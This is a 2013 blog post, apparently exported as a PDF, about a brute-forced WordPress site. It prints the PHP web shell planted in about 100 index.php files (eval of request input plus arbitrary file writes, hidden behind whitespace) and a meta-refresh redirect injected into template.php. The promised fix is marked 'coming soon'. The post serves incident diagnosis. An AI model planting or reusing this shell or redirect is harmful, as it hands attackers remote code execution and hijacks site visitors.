Wordpress Under Attack April 2013 - tips to remove spyware

Written by Michał SurowieckiSunday, 21 April 2013 22:03 - Last Updated Sunday, 21 April 2013 23:19

One of my client's wordpress site has been brute force hacked on 8th April. Some bots arelooking for Wordpress sites and try to log in with 1000 most popular passwords like admin,123456, qwerty or password.

The first sign of infection was a redirection to some Russian forum using some generated link:

http://smccoachhire.com//get.proxy2?t=phpbb_1_lom&k=14&c=10000&dir=::&host=www.smccoachhire.com&url=L2dldC5wcm94eTI/dD1waHBiYl8xX2xvbSZrPTE0JmM9MTAwMDAmZGlyPTo6Jmhvc3Q9d3d3LnNtY2NvYWNoaGlyZS5jb20mdXJsPUwyZGxkQzV3Y205NGVUSS9kRDF3YUhCaVlsOHhYMnh2YlNaclBURTBKbU05TVRBd01EQW1aR2x5UFRvNkptaHZjM1E5ZDNkM0xuTnRZMk52WVdOb2FHbHlaUzVqYjIwbWRYSnNQVXd5Wkd4a1F6VjNZMjA1TkdWVVNTOWtSREYzWVVoQ2FWbHNPSGhZTW5oMllsTmFjbEJVUlRCS2JVMDVUVlJCZDAxRVFXMWFSMng1VUZSdk5rcHRhSFpqTTFFNVpETmtNMHh1VG5SWk1rNTJXVmRPYjJGSGJIbGFVelZxWWpJd2JXUllTbk5RVlhkNlZXMDVXbFo2Vm5sVVJtaHpaRz FTVWxCVU1EMD0=

I got rid of this quickly by updating the Wordpress engine. But then the hosting provider startedto suspend the service saying that there are thousands of emails being sent from this site.

I found out that there has been created about 100 index.php files in random folders with somespyware script, every index.php file contains the same script but with some different values:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                            

1 / 4

Wordpress Under Attack April 2013 - tips to remove spyware

Written by Michał SurowieckiSunday, 21 April 2013 22:03 - Last Updated Sunday, 21 April 2013 23:19

                                                                  $yaiwk = "0f545b048c89659aa0606c4e6cc2f161";if(isset($_REQUEST['taxcrg'])) { $nvuqsty = $_REQUEST['taxcrg']; eval($nvuqsty); exit(); }if(isset($_REQUEST['gumzvif'])) { $ksfekbs = $_REQUEST['vsuxkaqx']; $koodnfkh =$_REQUEST['gumzvif']; $kdapwkh = fopen($koodnfkh, 'w'); $ordh = fwrite($kdapwkh,$ksfekbs); fclose($kdapwkh); echo $ordh; exit(); }

 

?>

There was also created one main php file which contains all paths and generated values of allindex.php files, it was called "dirs.php":

2 / 4

Wordpress Under Attack April 2013 - tips to remove spyware

Written by Michał SurowieckiSunday, 21 April 2013 22:03 - Last Updated Sunday, 21 April 2013 23:19

  There also has been some code added to the template.php file: <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctordeer.com">   SOLUTION:

coming soon...

 

 

Links:

3 / 4

Wordpress Under Attack April 2013 - tips to remove spyware

Written by Michał SurowieckiSunday, 21 April 2013 22:03 - Last Updated Sunday, 21 April 2013 23:19

Hackers Attack 90,000 WordPress Blogs

Wordpress Under Attack: How To Avoid The Coming Botnet

How to Avoid Being Hit by the WordPress Attack

Hacking the WordPress CMS. Or Stopping Someone Who Wants To

Blogi na WordPressie na celowniku hakerów

4 / 4